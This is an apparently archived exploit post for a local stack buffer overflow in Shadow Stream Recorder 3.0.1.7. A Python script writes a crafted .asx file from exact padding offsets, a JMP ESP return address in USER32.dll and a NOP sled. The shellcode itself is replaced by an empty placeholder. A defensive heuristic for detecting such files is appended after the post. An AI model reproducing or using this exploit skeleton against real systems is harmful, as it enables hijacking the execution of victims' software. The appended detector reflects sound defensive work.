
Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow

Posted on 30 March 2010

===========================================================
Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
===========================================================

#!/usr/bin/python
#
# Title: Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow
# Date: 03-29-2010
# Author: b0telh0
# Link: http://www.rm-to-mp3.net/downloads/ssrecordersetup.exe
# Tested on: Windows XP SP3
#
# windows/exec - 228 bytes
# EXITFUNC=seh, CMD=calc.exe
#
shellcode = ""  # placeholder: the 228-byte payload is not reproduced

junk  = "\x41" * 26112          # padding up to the saved return address
eip   = "\x53\x93\x37\x7E"      # 7E379353 USER32.dll (JMP ESP)
nops  = "\x90" * 20
junk2 = "\x41" * 3636           # trailing padding

try:
    file = open('b0t.asx', 'w')
    file.write(junk + eip + nops + shellcode + junk2)
    file.close()
    print " [+] b0t.asx created."
    print "[+] Open ssrecorder.exe..."
    print "[+] and drag and drop b0t.asx. "
except:
    print " [-] Error.. Can't write file to system. "

# Inj3ct0r.com [2010-03-30]
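A defender-side companion, added here and not part of the original post: a heuristic pre-open check for .asx playlists that flags the file layout the script above writes (no ASX markup, one unbroken token tens of kilobytes long, a long run of a single byte). The thresholds, the function name and both samples are assumptions constructed for illustration; the suspect sample reuses only the padding lengths from the post, with placeholder bytes in the return-address slot and no payload.

```python
import re

# Assumed triage thresholds; not taken from the post or from the vendor.
MAX_TOKEN = 2048      # longest whitespace-free run accepted in a playlist
MIN_SAME_RUN = 256    # identical consecutive bytes treated as padding

ASX_ROOT = re.compile(rb"<\s*asx\b", re.IGNORECASE)
LONG_TOKEN = re.compile(rb"\S{%d,}" % (MAX_TOKEN + 1))
SAME_RUN = re.compile(rb"(.)\1{%d,}" % (MIN_SAME_RUN - 1), re.DOTALL)


def triage_asx(data):
    """Return reasons why `data` does not look like a normal ASX playlist."""
    findings = []
    if not ASX_ROOT.search(data[:4096]):
        findings.append("no <asx> root element in first 4 KiB")
    m = LONG_TOKEN.search(data)
    if m:
        findings.append("unbroken token of %d bytes at offset %d"
                        % (len(m.group()), m.start()))
    m = SAME_RUN.search(data)
    if m:
        findings.append("run of %d identical bytes (0x%02x) at offset %d"
                        % (len(m.group()), m.group(1)[0], m.start()))
    return findings


# Constructed benign playlist.
BENIGN = (b'<asx version="3.0">\n'
          b'  <title>Example stream</title>\n'
          b'  <entry><ref href="http://media.example.com/live.asf" /></entry>\n'
          b'</asx>\n')

# Constructed suspect file: padding lengths from the post, placeholder bytes
# in the return-address slot, no payload.
SUSPECT = b"A" * 26112 + b"BBBB" + b"\x90" * 20 + b"A" * 3636

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, triage_asx(blob) or "clean")
```

A non-empty result is a reason to quarantine the file before it reaches the player; it is a triage heuristic and does not replace patching or removing the vulnerable application.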

 
